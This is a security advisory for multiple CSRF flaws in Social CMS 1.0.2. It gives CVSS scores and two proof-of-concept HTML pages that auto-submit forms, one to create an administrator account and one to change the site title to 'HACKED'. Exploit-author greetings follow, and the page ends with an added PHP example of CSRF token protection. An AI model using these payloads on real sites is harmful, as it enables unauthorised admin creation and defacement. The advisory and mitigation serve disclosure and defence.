Social CMS 1.0.2 Multiple CSRF Vulnerabilities

2012.10.16
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<!---
Title: socialcms1.0.2 Multiple CSRF Vulnerabilities
Author: vir0e5 a.k.a banditc0de <vir0e5@yahoo.com>
Date: Wed 20 April 2011 11:18:22 AM
Vendor: www.socialcms.com
Download: http://sourceforge.net/projects/socialcms/
--->

<!-- PoC 1: Create Admin User (save as its own HTML page) -->
<body onload='document.csrf.submit()'>
<form method="POST" name="csrf" action="http://localhost/web_test/socialcms/my_admin/admin1_members.php?action=member_new&page=1&mID=1" class="form">
<p><input type="hidden" name="TR_login_name" value="vir0e5"></p>
<p><input type="hidden" name="TR_firstname" value="bandit"></p>
<p><input type="hidden" name="TR_lastname" value="c0de"/></p>
<p><input type="hidden" name="TREF_email_address" value="vir0e5@hackermail.com"/></p>
<p><input type="hidden" name="TR_group_level" value=""/></p>
<!-- the form is submitted by the onload handler, so the submit control is sent as a hidden field -->
<input type="hidden" name="update" value="update" />
</form>
</body>

<!-- PoC 2: Default site title (save as its own HTML page) -->
<body onload='document.csrf.submit()'>
<form method="POST" name="csrf" action="http://localhost/web_test/socialcms/my_admin/admin1_configuration.php?gid=1&id=36&action=save" class="form">
<p><input type="hidden" name="TR_configuration_title" value="Default site title"></p>
<p><input type="hidden" name="TR_configuration_name" value="CSRF VULN"></p>
<p><input type="hidden" name="TR_configuration_value" value="HACKED"/></p>
<p><input type="hidden" name="configuration_description" value="CSRF"/></p>
<p><input type="hidden" name="IN_configuration_priority" value="0"/></p>
<input type="hidden" name="update" value="update" />
</form>
</body>

****************-------**DCI2k7**--------*****************
[+] Greetings : [ mywisdom - kiddies - kamtiez - r3m1ck - aciz_n1nj4 | mozartklik | syafm0vic - skuteng_boy - blue_screen - agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ;
[+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org | http://devilzc0de.org | http://santricyber.org | http://indonesiancoder.com | http://cyber4rt.com And OTHER's Cause i'm Alone!!
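Both PoCs work because the admin handlers accept any POST that arrives with the admin's session cookie. The following is an added defensive example, not SocialCMS code: a synchronizer-token check in PHP for a handler like admin1_members.php?action=member_new; the function names, the csrf_token field and the expected origin are assumptions.

```php
<?php
// Added example, not SocialCMS code: synchronizer-token CSRF protection for an
// admin handler such as admin1_members.php?action=member_new. Function names,
// the csrf_token field and the expected origin are assumptions.
declare(strict_types=1);

session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]); // PHP >= 7.3
session_start();

// One unguessable token per session, created on first use.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to emit inside every state-changing admin form.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only if the POST carries the session's token (constant-time compare) and,
// as defence in depth, the browser reports our own origin.
function csrf_check(array $post, array $server, string $expectedOrigin): bool {
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || $sent === '' || !hash_equals(csrf_token(), $sent)) {
        return false;
    }
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    return $origin !== '' && strpos($origin, $expectedOrigin) === 0;
}

// Vulnerable pattern from the advisory: any POST with the expected fields is
// acted on, so a page on another site can submit it with the admin's cookies.
// Hardened handler: verify the token before touching TR_login_name etc.
if (($_GET['action'] ?? '') === 'member_new' && $_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST, $_SERVER, 'http://localhost')) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    $login = $_POST['TR_login_name'] ?? '';
    // ... create the member with the validated input ...
}
```

The SameSite=Lax cookie alone already blocks the cross-site auto-submitted POST in current browsers, but the token check is what holds regardless of browser behaviour, and a 403 here is also a useful detection signal in the admin access log.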

References:

http://cxsecurity.com/issue/WLB-2012040012
http://sourceforge.net/projects/socialcms/

